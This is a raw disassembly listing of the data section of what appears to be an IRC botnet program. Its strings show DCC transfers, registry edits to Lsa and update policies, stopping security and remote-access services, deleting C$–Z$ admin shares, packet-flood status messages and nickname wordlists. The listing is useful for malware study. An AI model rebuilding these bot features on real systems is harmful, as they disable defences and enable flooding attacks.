dword_44DC94 dd 4E495001h, 73252047h, 0dword_44DCA0 dd 4E495001h, 47haTransferComple db 'Transfer complete from IP: %s, File: %s (%s bytes).',0
; DATA XREF: sub_420399+582�o
aSSOpeningFileF db '%s %s opening file for writing.',0 ; DATA XREF: sub_420399+441�o
off_44DCFC dd offset byte_622B61 ; DATA XREF: sub_420399+423�o
aSSUnableToWrit db '%s %s unable to write file to disk.',0 ; DATA XREF: sub_420399+40F�o
aSend_0 db 'SEND',0 ; DATA XREF: sub_420399+39C�o
align 4
aSDccRequestFro db '%s DCC request from: %s!%s@%s',0 ; DATA XREF: sub_420399+38C�o
align 4
dword_44DD4C dd 43434401h, 0 aSVersionReques db '%s Version request from: %s!%s@%s',0 ; DATA XREF: sub_420399+346�o
align 4
dword_44DD78 dd 52455601h, 4E4F4953h, 1732520h, 0dword_44DD88 dd 52455601h, 4E4F4953h, 1aSSSS@SPassTrie db '%s %s [%s!%s@%s] (Pass Tried -> %s)',0 ; DATA XREF: sub_420399+212�o
aSS@S db '%s!%s@%s',0 ; DATA XREF: sub_420399+1A7�o
align 4
aSSSS@SSentPmS db '%s %s %s!%s@%s (Sent PM -> "%s")',0 ; DATA XREF: sub_420399+154�o
align 4
asc_44DDE8: ; DATA XREF: sub_420399+28�o
; sub_420A75+8C�o
unicode 0, <+>,0
aTopic db 'topic',0 ; DATA XREF: sub_420A75+10B�o
align 4
a433 db '433',0 ; DATA XREF: sub_420CC8+BA�o
; sub_42630C:loc_426387�o
a422 db '422',0 ; DATA XREF: sub_420CC8+A9�o
a376 db '376',0 ; DATA XREF: sub_420CC8+9C�o
a005 db '005',0 ; DATA XREF: sub_420CC8+91�o
a366 db '366',0 ; DATA XREF: sub_420CC8+7D�o
a332 db '332',0 ; DATA XREF: sub_420CC8+6C�o
a302 db '302',0 ; DATA XREF: sub_420CC8+5F�o
off_44DE10 dd offset dword_554B48 ; DATA XREF: sub_420D92+7D�o
aHkey_users db 'HKEY_USERS',0 ; DATA XREF: sub_420D92+71�o
align 10h
aHkcc db 'HKCC',0 ; DATA XREF: sub_420D92+65�o
align 4
aHkey_current_c db 'HKEY_CURRENT_CONFIG',0 ; DATA XREF: sub_420D92+59�o
aHkcr db 'HKCR',0 ; DATA XREF: sub_420D92+4D�o
align 4
aHkey_classes_r db 'HKEY_CLASSES_ROOT',0 ; DATA XREF: sub_420D92+41�o
align 4
aHkcu db 'HKCU',0 ; DATA XREF: sub_420D92+35�o
; sub_421783+9B�o ...
align 10h
aHkey_current_u db 'HKEY_CURRENT_USER',0 ; DATA XREF: sub_420D92+29�o
align 4
aHklm db 'HKLM',0 ; DATA XREF: sub_420D92+1D�o
; sub_421783+94�o ...
align 4
aHkey_local_mac db 'HKEY_LOCAL_MACHINE',0 ; DATA XREF: sub_420D92+D�o
align 10h
aReg_dword db 'REG_DWORD',0 ; DATA XREF: sub_420E3E:loc_420E6F�o
align 4
aReg_multi_sz db 'REG_MULTI_SZ',0 ; DATA XREF: sub_420E3E:loc_420E91�o
align 4
aReg_expand_sz db 'REG_EXPAND_SZ',0 ; DATA XREF: sub_420E3E:loc_420E5D�o
align 4
aReg_sz db 'REG_SZ',0 ; DATA XREF: sub_420E3E:loc_420E63�o
align 4
aReg_dword_big_ db 'REG_DWORD_BIG_ENDIAN',0 ; DATA XREF: sub_420E3E:loc_420E9D�o
align 4
aReg_link db 'REG_LINK',0 ; DATA XREF: sub_420E3E:loc_420E97�o
align 4
aReg_qword db 'REG_QWORD',0 ; DATA XREF: sub_420E3E:loc_420E8B�o
align 4
aUnknown_0 db 'UNKNOWN',0 ; DATA XREF: sub_420E3E:loc_420E85�o
aReg_none db 'REG_NONE',0 ; DATA XREF: sub_420E3E:loc_420E69�o
align 4
aReg_binary db 'REG_BINARY',0 ; DATA XREF: sub_420E3E+19�o
align 4
a_2dSSS db '(%.2d) %s\%s (%s)',0 ; DATA XREF: sub_42105D+169�o
align 4
aDefault db '(Default)',0 ; DATA XREF: sub_42105D+148�o
align 4
a_2dSS db '(%.2d) %s\%s',0 ; DATA XREF: sub_42105D+C0�o
align 8
off_44DF48 dd offset aTlntsvr ; DATA XREF: sub_421DCA+2D�r
; "Tlntsvr"
dd offset aRemoteregistry ; "RemoteRegistry"
dd offset aMessenger ; "Messenger"
dd offset aWscsvc ; "wscsvc"
off_44DF58 dd offset aTelnet ; DATA XREF: sub_421DCA+6E�r
; sub_421DCA+AB�r ...
; "Telnet"
dd offset aRemoteRegistry ; "Remote Registry"
dd offset aMessenger ; "Messenger"
dd offset aSecurityCenter ; "Security Center"
dword_44DF68 dd 80000002h ; sub_421783:loc_42180D�r ...
dword_44DF6C dd 54535953h ; sub_421783+14E�r
aEmCurrentcontr db 'EM\CurrentControlSet\Control\Lsa',0
align 4
dd 35h dup(0)
db 3 dup(0)
dword_44E06B dd 74736572h ; sub_421783:loc_4218C9�r
aRictanonymous db 'rictanonymous',0
align 10h
dd 3Bh dup(0)
dword_44E16C dd 4 dword_44E170 dd 1 ; sub_421783+7C�r ...
dword_44E174 dd 0 ; sub_421783:loc_421807�r ...
dword_44E178 dd 0 ; sub_421783+18B�r ...
dd 3Eh dup(0)
db 3 dup(0)
dword_44E277 dd 0 ; sub_421783+193�r ...
align 4
dd 3Fh dup(0)
dd 80000002h, 54464F53h, 45524157h, 6C6F505Ch, 65696369h
dd 694D5C73h, 736F7263h, 5C74666Fh, 646E6957h, 5C73776Fh
dd 646E6957h, 5573776Fh, 74616470h, 65h, 32h dup(0)
dd 44000000h, 746F4E6Fh, 6F6C6C41h, 53505877h, 3250h, 3Ch dup(0)
dd 4, 1, 81h dup(0)
dd 80000002h, 74666F53h, 65726177h, 63694D5Ch, 6F736F72h
dd 4F5C7466h, 454Ch, 39h dup(0)
dd 45000000h, 6C62616Eh, 4F434465h, 4Dh, 3Dh dup(0)
dd 1, 2 dup(0)
dd 4Eh, 3Eh dup(0)
dd 59000000h, 40h dup(0)
off_44EB98 dd offset off_44EF38 ; DATA XREF: sub_421A4D+85�r
; sub_421A4D:loc_421B0A�r ...
dword_44EB9C dd 0 dd offset off_44EF28
align 8
dd offset off_44EF18
align 10h
dd offset aC_1 ; "C$"
dd offset aC_2 ; "C:\\"
dd offset aD_1 ; "D$"
dd offset aD_2 ; "D:\\"
dd offset aE_2 ; "E$"
dd offset aE_3 ; "E:\\"
dd offset aF_0 ; "F$"
dd offset aF_1 ; "F:\\"
dd offset aG_0 ; "G$"
dd offset aG_1 ; "G:\\"
dd offset asc_44EEC0 ; "H$"
dd offset asc_44EEB8 ; "H:\\"
dd offset aI_2 ; "I$"
dd offset aI_3 ; "I:\\"
dd offset aJ_0 ; "J$"
dd offset aJ_1 ; "J:\\"
dd offset aJ_0 ; "J$"
dd offset aJ_1 ; "J:\\"
dd offset aK_1 ; "K$"
dd offset aK_2 ; "K:\\"
dd offset asc_44EE80 ; "L$"
dd offset asc_44EE78 ; "L:\\"
dd offset aM_5 ; "M$"
dd offset aM_6 ; "M:\\"
dd offset aN_0 ; "N$"
dd offset aN_1 ; "N:\\"
dd offset aO_0 ; "O$"
dd offset aO_1 ; "O:\\"
dd offset aP_4 ; "P$"
dd offset aP_5 ; "P:\\"
dd offset aQ_1 ; "Q$"
dd offset aQ_2 ; "Q:\\"
dd offset aR_0 ; "R$"
dd offset aR_1 ; "R:\\"
dd offset aS_9 ; "S$"
dd offset aS_8 ; "S:\\"
dd offset aT_0 ; "T$"
dd offset aT_1 ; "T:\\"
dd offset aU_2 ; "U$"
dd offset aU_1 ; "U:\\"
dd offset aV_0 ; "V$"
dd offset aV_1 ; "V:\\"
dd offset aW_0 ; "W$"
dd offset aW_1 ; "W:\\"
dd offset asc_44EDC0 ; "X$"
dd offset asc_44EDB8 ; "X:\\"
dd offset aY_1 ; "Y$"
dd offset aY_2 ; "Y:\\"
dd offset aZ_2 ; "Z$"
dd offset aZ_3 ; "Z:\\"
dd offset off_44EF18
dd offset off_44ED84
dd offset off_44EF28
dd offset off_44ED74
dd offset off_44EF38
dd offset off_44ED68
dd offset off_44EF38
dd offset off_44ED5C
dd offset off_44EF38
dd offset off_44ED48
dd offset off_44EF38
dd offset aWkssvc ; "wkssvc\\"
dd offset off_44EF38
dd offset aSrvsvc ; "srvsvc\\"
dd offset off_44ED14
dd offset off_44ED00
dd offset off_44EF38
dd offset aTsclient ; "tsclient\\"
dd offset off_44EF38
dd offset aTsweb ; "tsweb\\"
dd offset off_44EF38
dd offset off_44ECD0
off_44ECD0 dd offset dword_50004C ; DATA XREF: .text:0044ECCC�o
dd offset dword_520054
dd 5Ch
aTsweb: ; DATA XREF: .text:0044ECC4�o
unicode 0, <tsweb\>,0
align 4
aTsclient: ; DATA XREF: .text:0044ECBC�o
unicode 0, <tsclient\>,0
off_44ED00 dd offset word_65006E ; DATA XREF: .text:0044ECB4�o
aTlogon:
unicode 0, <tlogon\>,0
off_44ED14 dd offset aSPstore_dllNot+6 ; DATA XREF: .text:0044ECB0�o
dd offset dword_4C0054
dd offset byte_47004F
dd offset byte_4E004F
dd 24h
aSrvsvc: ; DATA XREF: .text:0044ECAC�o
unicode 0, <srvsvc\>,0
aWkssvc: ; DATA XREF: .text:0044ECA4�o
unicode 0, <wkssvc\>,0
off_44ED48 dd offset word_520042 ; DATA XREF: .text:0044EC9C�o
dd offset byte_57004F
dd offset aSPstore_dllNot+0Bh
dd offset word_5C0052
dd 0
off_44ED5C dd offset dword_490050 ; DATA XREF: .text:0044EC94�o
dd offset aSPstore_dllNot+8
dd 5Ch
off_44ED68 dd offset byte_500049 ; DATA XREF: .text:0044EC8C�o
dd offset byte_5C0043
dd 0
off_44ED74 dd offset aRy6iq0udbphN2n+9 ; DATA XREF: .text:0044EC84�o
dd offset byte_49004D
dd offset word_5C004E
dd 0
off_44ED84 dd offset dword_520050 ; DATA XREF: .text:0044EC7C�o
dd offset byte_4E0049
dd offset aSPstore_dllNot+0Ch
dd offset word_5C0052
align 8
aZ_3: ; DATA XREF: .text:0044EC74�o
unicode 0, <Z:\>,0
aZ_2: ; DATA XREF: .text:0044EC70�o
unicode 0, <Z$>,0
align 4
aY_2: ; DATA XREF: .text:0044EC6C�o
unicode 0, <Y:\>,0
aY_1: ; DATA XREF: .text:0044EC68�o
unicode 0, <Y$>,0
align 4
asc_44EDB8: ; DATA XREF: .text:0044EC64�o
unicode 0, <X:\>,0
asc_44EDC0: ; DATA XREF: .text:0044EC60�o
unicode 0, <X$>,0
align 4
aW_1: ; DATA XREF: .text:0044EC5C�o
unicode 0, <W:\>,0
aW_0: ; DATA XREF: .text:0044EC58�o
unicode 0, <W$>,0
align 4
aV_1: ; DATA XREF: .text:0044EC54�o
unicode 0, <V:\>,0
aV_0: ; DATA XREF: .text:0044EC50�o
unicode 0, <V$>,0
align 4
aU_1: ; DATA XREF: .text:0044EC4C�o
unicode 0, <U:\>,0
aU_2: ; DATA XREF: .text:0044EC48�o
unicode 0, <U$>,0
align 4
aT_1: ; DATA XREF: .text:0044EC44�o
unicode 0, <T:\>,0
aT_0: ; DATA XREF: .text:0044EC40�o
unicode 0, <T$>,0
align 4
aS_8: ; DATA XREF: .text:0044EC3C�o
unicode 0, <S:\>,0
aS_9: ; DATA XREF: .text:0044EC38�o
unicode 0, <S$>,0
align 4
aR_1: ; DATA XREF: .text:0044EC34�o
unicode 0, <R:\>,0
aR_0: ; DATA XREF: .text:0044EC30�o
unicode 0, <R$>,0
align 4
aQ_2: ; DATA XREF: .text:0044EC2C�o
unicode 0, <Q:\>,0
aQ_1: ; DATA XREF: .text:0044EC28�o
unicode 0, <Q$>,0
align 4
aP_5: ; DATA XREF: .text:0044EC24�o
unicode 0, <P:\>,0
aP_4: ; DATA XREF: .text:0044EC20�o
unicode 0, <P$>,0
align 4
aO_1: ; DATA XREF: .text:0044EC1C�o
unicode 0, <O:\>,0
aO_0: ; DATA XREF: .text:0044EC18�o
unicode 0, <O$>,0
align 4
aN_1: ; DATA XREF: .text:0044EC14�o
unicode 0, <N:\>,0
aN_0: ; DATA XREF: .text:0044EC10�o
unicode 0, <N$>,0
align 4
aM_6: ; DATA XREF: .text:0044EC0C�o
unicode 0, <M:\>,0
aM_5: ; DATA XREF: .text:0044EC08�o
unicode 0, <M$>,0
align 4
asc_44EE78: ; DATA XREF: .text:0044EC04�o
unicode 0, <L:\>,0
asc_44EE80: ; DATA XREF: .text:0044EC00�o
unicode 0, <L$>,0
align 4
aK_2: ; DATA XREF: .text:0044EBFC�o
unicode 0, <K:\>,0
aK_1: ; DATA XREF: .text:0044EBF8�o
unicode 0, <K$>,0
align 4
aJ_1: ; DATA XREF: .text:0044EBEC�o
; .text:0044EBF4�o
unicode 0, <J:\>,0
aJ_0: ; DATA XREF: .text:0044EBE8�o
; .text:0044EBF0�o
unicode 0, <J$>,0
align 4
aI_3: ; DATA XREF: .text:0044EBE4�o
unicode 0, <I:\>,0
aI_2: ; DATA XREF: .text:0044EBE0�o
unicode 0, <I$>,0
align 4
asc_44EEB8: ; DATA XREF: .text:0044EBDC�o
unicode 0, <H:\>,0
asc_44EEC0: ; DATA XREF: .text:0044EBD8�o
unicode 0, <H$>,0
align 4
aG_1: ; DATA XREF: .text:0044EBD4�o
unicode 0, <G:\>,0
aG_0: ; DATA XREF: .text:0044EBD0�o
unicode 0, <G$>,0
align 4
aF_1: ; DATA XREF: .text:0044EBCC�o
unicode 0, <F:\>,0
aF_0: ; DATA XREF: .text:0044EBC8�o
unicode 0, <F$>,0
align 4
aE_3: ; DATA XREF: .text:0044EBC4�o
unicode 0, <E:\>,0
aE_2: ; DATA XREF: .text:0044EBC0�o
unicode 0, <E$>,0
align 4
aD_2: ; DATA XREF: .text:0044EBBC�o
unicode 0, <D:\>,0
aD_1: ; DATA XREF: .text:0044EBB8�o
unicode 0, <D$>,0
align 4
aC_2: ; DATA XREF: .text:0044EBB4�o
unicode 0, <C:\>,0
aC_1: ; DATA XREF: .text:0044EBB0�o
unicode 0, <C$>,0
align 4
off_44EF18 dd offset dword_520050 ; DATA XREF: .text:0044EBA8�o
; .text:0044EC78�o
dd offset byte_4E0049
aT_2:
unicode 0, <T$>,0
align 4
off_44EF28 dd offset aRy6iq0udbphN2n+9 ; DATA XREF: .text:0044EBA0�o
; .text:0044EC80�o
dd offset byte_49004D
aN_2:
unicode 0, <N$>,0
align 4
off_44EF38 dd offset byte_500049 ; DATA XREF: .text:off_44EB98�o
; .text:0044EC88�o ...
aC_3:
unicode 0, <C$>,0
align 4
aSecurityCenter db 'Security Center',0 ; DATA XREF: .text:0044DF64�o
aRemoteRegistry db 'Remote Registry',0 ; DATA XREF: .text:0044DF5C�o
aTelnet db 'Telnet',0 ; DATA XREF: .text:off_44DF58�o
align 4
aWscsvc db 'wscsvc',0 ; DATA XREF: .text:0044DF54�o
align 4
aMessenger db 'Messenger',0 ; DATA XREF: .text:0044DF50�o
; .text:0044DF60�o
align 10h
aRemoteregistry db 'RemoteRegistry',0 ; DATA XREF: .text:0044DF4C�o
align 10h
aTlntsvr db 'Tlntsvr',0 ; DATA XREF: .text:off_44DF48�o
aSRegistryS_2d_ db '%s Registry %s, (%.2d/%.2d)',0 ; DATA XREF: sub_421783+2AE�o
aSFailedToSRegi db '%s Failed to %s Registry, (%.2d/%.2d)',0 ; DATA XREF: sub_421783+275�o
align 4
aSecured db 'Secured',0 ; DATA XREF: sub_421783+25E�o
aSFailedToSet_0 db '%s Failed to set "%s\%s\%s" to "%s".',0 ; DATA XREF: sub_421783+21D�o
align 4
aSSetSSSToS_ db '%s Set "%s\%s\%s" to "%s".',0 ; DATA XREF: sub_421783+1C4�o
align 4
aSFailedToSetSS db '%s Failed to set "%s\%s\%s" to "%d".',0 ; DATA XREF: sub_421783+11F�o
align 10h
aSSetSSSToD_ db '%s Set "%s\%s\%s" to "%d".',0 ; DATA XREF: sub_421783+B5�o
align 4
aSTotalShares_0 db '%s Total shares [%s: %d]',0 ; DATA XREF: sub_421A4D+365�o
align 4
aTotalSharesS_0 db ' Total shares [%s: %d]',0 ; DATA XREF: sub_421A4D+343�o
align 10h
aSNoSharesS_ db '%s No shares %s.',0 ; DATA XREF: sub_421A4D:loc_421D77�o
align 4
aUnloading db 'Unloading',0 ; DATA XREF: sub_421A4D+289�o
align 10h
aCreated db 'created',0 ; DATA XREF: sub_421A4D+23E�o
aSTotalSharesSD db '%s Total shares %s: [%d]',0 ; DATA XREF: sub_421A4D+231�o
align 4
aTotalSharesSD db ' Total shares: [%s: %d]',0 ; DATA XREF: sub_421A4D+1CF�o
off_44F0FC dd offset dword_532520 ; DATA XREF: sub_421A4D+C9�o
; sub_421A4D+157�o ...
dword_44F100 dd 2Ch ; sub_421A4D+142�o ...
dword_44F104 dd 53207325h, 65726168h, 73252073h, 3Ah ; sub_421A4D+256�o
aErased db 'erased',0 ; DATA XREF: sub_421A4D+34�o
; sub_421A4D:loc_421C05�o ...
align 4
aSTotalServices db '%s Total services stopped: %d',0 ; DATA XREF: sub_421DCA+15E�o
align 4
aSNoServicesSto db '%s No services stopped.',0 ; DATA XREF: sub_421DCA+136�o
aSTheSServiceWa db '%s The %s service was not started.',0 ; DATA XREF: sub_421DCA+F0�o
align 4
aSSServiceStopp db '%s %s service stopped.',0 ; DATA XREF: sub_421DCA+B2�o
align 10h
aSTheSServiceDo db '%s The %s service does not exist.',0 ; DATA XREF: sub_421DCA+75�o
align 4
aSystemShutting db 'System shutting down.',0 ; DATA XREF: sub_421F40+E8�o
align 4
aS_4 db '"%s"',0 ; DATA XREF: sub_42211B+14�o
align 4
aSErrorD db '%s Error: %d',0 ; DATA XREF: sub_42251B+2EB�o
align 4
aSCanTSyn_Error db '%s Can',27h,'t Syn. Error: %d',0 ; DATA XREF: sub_42251B+95�o
; sub_42251B+D9�o ...
aSS@IkbS db '%s %s @ (%iKB/s)',0 ; DATA XREF: sub_4228EE+60�o
align 10h
aSCanTUseRawOpt db '%s Can',27h,'t use raw opt: %d',0 ; DATA XREF: sub_422A87+120�o
align 10h
aSErrorSendingP db '%s Error sending packets to IP: %s. Packets sent: %d. Error: <%d>'
; DATA XREF: sub_422D47+611�o
db '.',0
align 4
aSSWithSToIpS_S db '%s %s with %s to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).',0
; DATA XREF: sub_422D47+589�o
align 4
aSInvalidTarget db '%s Invalid target IP.',0 ; DATA XREF: sub_422D47+1D4�o
align 4
aSSD__0 db '%s %s <%d>.',0 ; DATA XREF: sub_422D47+8B�o
; sub_422D47+138�o
aSSS_3 db '%s (%s) %s',0 ; DATA XREF: sub_42358B+81�o
align 4
aD_S db '%d. %s',0 ; DATA XREF: sub_423650+61�o
align 4
aSThreadsList db '%s Threads List:',0 ; DATA XREF: sub_423650+37�o
align 10h
off_44F300 dd offset aQ ; DATA XREF: sub_426698+69�r
; "q"
dd offset aW_3 ; "w"
dd offset aE_0 ; "e"
dd offset word_43EF70
dd offset aT_4 ; "t"
dd offset aY ; "y"
dd offset aU_4 ; "u"
dd offset aI_5 ; "i"
dd offset aP_6 ; "p"
dd offset dword_43DAAC
dd offset aS_2 ; "s"
dd offset aD_4 ; "d"
dd offset aF_3 ; "f"
dd offset aG_3 ; "g"
dd offset asc_450024 ; "h"
dd offset aJ_3 ; "j"
dd offset aK_4 ; "k"
dd offset asc_450018 ; "l"
dd offset aZ_5 ; "z"
dd offset dword_43AB88
dd offset word_43EF74
dd offset aV_3 ; "v"
dd offset aB_2 ; "b"
dd offset aN_4 ; "n"
dd offset aM_7 ; "m"
dd offset aQ_3 ; "Q"
dd offset aW_2 ; "W"
dd offset aE_4 ; "E"
dd offset aR_2 ; "R"
dd offset aT_3 ; "T"
dd offset aY_3 ; "Y"
dd offset aU_3 ; "U"
dd offset aI_4 ; "I"
dd offset aO_3 ; "O"
dd offset aP ; "P"
dd offset aA_0 ; "A"
dd offset aS_10 ; "S"
dd offset aD_3 ; "D"
dd offset aF_2 ; "F"
dd offset aG_2 ; "G"
dd offset asc_44FFC8 ; "H"
dd offset aJ_2 ; "J"
dd offset aK_3 ; "K"
dd offset asc_44FFBC ; "L"
dd offset aZ_4 ; "Z"
dd offset asc_43D940 ; "X"
dd offset aC_4 ; "C"
dd offset aV_2 ; "V"
dd offset aB_1 ; "B"
dd offset aN_3 ; "N"
dd offset aM ; "M"
dd offset aSm4rt3 ; "SM4RT3"
dd offset aFar0oq ; "far0oq"
dd offset aMax1xguy ; "max1xguy"
dd offset aB0bm4rl3y ; "B0BM4RL3Y"
dd offset aEmilya ; "emilya"
dd offset aEmilyia ; "Emilyia"
dd offset aKr1zha ; "KR1ZHA"
dd offset aC4r1nna ; "C4r1nna"
dd offset aSw1n ; "sw1n"
dd offset aM4le ; "m4le"
dd offset aKok00 ; "kok00"
dd offset aFl3xxxt3r ; "fl3xxxt3r"
dd offset aK3nnn ; "k3nnn"
dd offset aXc4libr3 ; "xc4libr3"
dd offset aXtcXcal ; "xTc-xCaL"
dd offset aPwntuuuu ; "pwntuuuu"
dd offset aShezzza ; "Shezzza"
dd offset aTalika ; "Talika"
dd offset aM4rcy ; "m4rcy"
dd offset aSeiny ; "seiny"
dd offset aSe1nf3ld ; "se1nf3ld"
dd offset aCmecme ; "cmecme"
dd offset aHev4l ; "hev4l"
dd offset aBunty007 ; "bunty007"
dd offset aJann0 ; "jann0"
dd offset aR1mpy ; "r1mpy"
dd offset aH4xdd ; "h4xdd-"
dd offset aNastsha ; "nastsha"
dd offset aLisau ; "Lisau"
dd offset aTr0ll3r ; "tr0ll3r"
dd offset aM4n4e ; "m4n4e"
dd offset aK3rm1t ; "k3rm1t"
dd offset aPur3g0ld ; "pur3g0ld"
dd offset aC0redumpdd ; "C0reDumpDd"
dd offset aIiimra ; "iiimra"
dd offset aGirlzx ; "GirLzx"
dd offset aCam3l ; "CAM3L-"
dd offset aReshma ; "reshma"
dd offset aK3ncing ; "K3ncing"
dd offset aR45h3r ; "R45H3R"
dd offset aC4nsuu ; "c4nsuu"
dd offset aKandent ; "kandent"
dd offset aErk4nerkali ; "erk4nerkali"
dd offset aHexa4a ; "hexa4a"
dd offset aBerkkkko ; "berkkkko"
dd offset aBenibi ; "BeNiBi"
dd offset aIrm4ll ; "irm4Ll"
dd offset aMizsund4y ; "mizsund4y"
dd offset aTolga38 ; "Tolga38"
dd offset aJer1cho ; "JER1CHO"
dd offset aM4ry ; "M4RY-"
dd offset aAk1n ; "AK1N"
dd offset aMel3kk ; "mel3kk"
dd offset aTrr3nd ; "trr3nd"
dd offset aMERV ; "M-E-R-V"
dd offset aTekir ; "tekir"
dd offset aVenedik34 ; "venedik34"
dd offset aSevmekmi ; "sevmekmi"
dd offset aSud3nur ; "SUD3NUR"
dd offset aR0t0r ; "r0t0r-"
dd offset aR0t0 ; "r0t0"
dd offset aSmokeySn ; "smokey-sn"
dd offset aSmok3yS ; "smok3y-s"
dd offset aR0t0r ; "r0t0r-"
dd offset aRyann ; "ryann"
dd offset aNils ; "Nils-"
dd offset aDog ; "dog-"
dd offset aD_ ; "d_"
dd offset a_d ; "_d"
dd offset aBl0ndu ; "Bl0ndu"
dd offset aAkw1dz ; "AKW1Dz"
dd offset aRot0r ; "rot0r"
dd offset aBlondu ; "Blondu-"
dd offset aXc4l ; "XC4L"
dd offset aXtczzz ; "xTczzz"
dd offset aDczz ; "dczz"
dd offset aAhm3txtc ; "Ahm3tXTC"
dd offset aArzu ; "ARZU"
dd offset aHaticem ; "haticem"
dd offset aErnesto ; "ERNESTO"
dd offset aAslii ; "aslii"
dd offset aPiram1t ; "PIRAM1T"
dd offset aSamy3li ; "samy3li"
dd offset aRetg ; "RETG-"
dd offset aBlackp34rl ; "blackp34rl"
dd offset aPelinci ; "pelinci"
dd offset aAhm3t ; "ahm3t"
dd offset aTurkyballs ; "turkyballs"
dd offset aAnk32m ; "ank32m"
dd offset aAck0111 ; "ACK0111"
dd offset aIzm1rm ; "Izm1rm"
dd offset aAlb1na ; "alb1na"
dd offset aAyla ; "AYLA-"
dd offset aAte3e ; "AtE3e"
dd offset aAnkh4h ; "ankh4h"
dd offset aDonju4nm ; "Donju4nm"
dd offset aBog4c3r ; "bog4c3r"
dd offset aAlpay3m ; "alpay3m"
dd offset aCongu ; "CoNGU"
dd offset aDzlim ; "DzliM"
dd offset aDevran ; "DeVran"
dd offset aArd4k ; "ard4k"
dd offset aKeyifli ; "keyifli"
dd offset aMuratm_ ; "muratm_"
dd offset aHak4n3 ; "hak4n3"
dd offset aIrz4l ; "IRZ4L"
dd offset aAmth4n ; "AMTH4N"
dd offset aEmr3e ; "Emr3e"
dd offset aElm4zyok ; "elm4zyok"
dd offset aEsm3rkiz ; "Esm3rkiz"
dd offset aKeb1kec ; "keb1kec"
dd offset aFl0rd ; "FL0RD"
dd offset aH0ly1 ; "h0ly1"
dd offset aMahinure ; "MAHINURE"
dd offset aEllesme ; "Ellesme"
dd offset aAkut1 ; "akut1"
dd offset aKashmira ; "Kashmira"
dd offset aS3vis ; "S3ViS"
dd offset aSugaboi ; "SUGABOi"
dd offset aUzgun36 ; "uzgun36"
dd offset aKumul ; "kumul"
dd offset aAd4lim ; "AD4LIM"
dd offset aUmut00 ; "umut00"
dd offset aAnk32 ; "ANK32"
dd offset aDjmace ; "DJMACE"
dd offset aAnkart ; "Ankart"
dd offset aF3n3r ; "F3N3R"
dd offset aH4yr4n ; "h4yr4n"
dd offset aAng3lg4l ; "ang3lg4l"
dd offset aK4pk ; "k4pk"
dd offset aAchill3s ; "Achill3s"
dd offset aT3gm3n ; "T3GM3N"
dd offset aKot4n ; "kot4n"
dd offset aSevdan ; "sevdan"
dd offset aErkaaaa ; "ERKAAAA"
dd offset aAlcatrazak ; "alcatraZAK"
dd offset aA44mmm ; "a44mmm"
dd offset aB1rs3n ; "b1rs3n"
dd offset aYab4nc ; "yab4nc"
dd offset aD3vre ; "d3vre"
dd offset aErk3nnn ; "erk3nnn"
dd offset aAnkm4a ; "ankM4a"
dd offset aAd3m28 ; "Ad3m28"
dd offset aMaxs1lla ; "maxs1lla"
dd offset aM41st ; "M41ST"
dd offset aAd33 ; "Ad33"
dd offset aFirt ; "firt"
dd offset aAta29111 ; "Ata29111"
dd offset aK00oray ; "K00ORAY"
dd offset aAkd3nnan ; "akd3nnan"
dd offset aLizmirlm ; "Lizmirlm"
dd offset aUlaru ; "ularu"
dd offset aNe__ ; "NE__"
dd offset aPassenger ; "passenger"
dd offset aTr0pikal ; "tr0pikal"
dd offset aC00l30m ; "c00l30m"
dd offset aC3m39 ; "c3m39"
dd offset aRerpjj ; "RERPJJ"
dd offset aTeoman ; "TEOMAN``"
dd offset aDallas ; "DALLAS"
dd offset aProm3theus ; "prom3theus"
dd offset aMaverick ; "MavericK"
dd offset aAdammo ; "ADAMMO"
dd offset aCumhur ; "cumhur"
dd offset aBiatch ; "biatch"
dd offset aW4nt3d ; "W4NT3D"
dd offset aBaby ; "baby"
dd offset aPizza ; "pizza"
dd offset aFat ; "fat"
dd offset aChild ; "child"
dd offset aMoon ; "moon"
dd offset aMan ; "man"
align 10h
off_44F680 dd offset aSh3x ; DATA XREF: sub_426698+4E�r
; sub_426698+F8�r
; "sh3x"
dd offset aLez ; "lez"
dd offset aZex ; "zex"
dd offset aTree ; "tree"
dd offset off_44F9B0
dd offset off_44F9AC
dd offset aTambe ; "|tambe|"
dd offset aWoh ; "|woh|"
dd offset aTot ; "-|tot|"
dd offset aSuck ; "|suck|"
dd offset aLuck ; "|luck|"
dd offset aHub ; "{hub}"
dd offset aSex ; "{sex}"
dd offset aGens ; "{gens|"
dd offset aLuf ; "|luf|"
dd offset aWikd ; "|wikd"
dd offset aSi ; "si}}"
dd offset aQ809 ; "Q809"
dd offset aDd8A ; "|dd8|a"
dd offset aB_2 ; "b"
dd offset word_43EF74
dd offset aD_4 ; "d"
dd offset aE_0 ; "e"
dd offset aF_3 ; "f"
dd offset aG_3 ; "g"
dd offset asc_450024 ; "h"
dd offset aI_5 ; "i"
dd offset a__2 ; "_"
dd offset aJ_3 ; "j"
dd offset aK_4 ; "k"
dd offset asc_450018 ; "l"
dd offset aM_7 ; "m"
dd offset aN_4 ; "n"
dd offset aO_2 ; "o"
dd offset aP_6 ; "p"
dd offset aQ ; "q"
dd offset aRs ; "rs"
dd offset aT_4 ; "t"
dd offset aU_4 ; "u"
dd offset aV_3 ; "v"
dd offset aW_3 ; "w"
dd offset dword_43AB88
dd offset aY ; "y"
dd offset aZ_5 ; "z"
dd offset aHay ; "hay"
dd offset aRg ; "rg"
dd offset aTy ; "ty"
dd offset aGf ; "gf"
dd offset aRt ; "rt"
dd offset aDf ; "df"
dd offset aUi ; "ui"
dd offset aLuvy ; "luvy"
dd offset aTry ; "try"
dd offset aTrick ; "trick"
dd offset off_44F904
dd offset aZ_5 ; "z"
dd offset aG_3 ; "g"
dd offset aS_2 ; "s"
dd offset aQ ; "q"
dd offset aAfk ; "afk"
dd offset aAway ; "away"
dd offset dword_44F8F0
dd offset dword_44F8E8
dd offset off_44F8E4
dd offset aBbl ; "|bbl"
dd offset aW00i3s ; "w00i3s-"
dd offset aJunk ; "junk"
dd offset off_44F8C8
dd offset aF_2 ; "F"
dd offset aM ; "M"
dd offset aLuvu ; "LUVU"
dd offset off_44F8BC
dd offset aAa ; "^AA^"
dd offset aB_2 ; "b"
dd offset byte_454A34
dd offset aSl33pin ; "Sl33piN"
dd offset byte_454A34
dd offset byte_454A34
dd offset aFook ; "|Fook|"
dd offset aFree ; "Free"
dd offset byte_454A34
dd offset byte_454A34
dd offset asc_43D940 ; "X"
dd offset byte_454A34
dd offset off_44F898
dd offset aGirl ; "GIRL"
dd offset aGurl ; "gurl"
dd offset aShit ; "shit"
dd offset off_44F87C
dd offset aYeah ; "yeah"
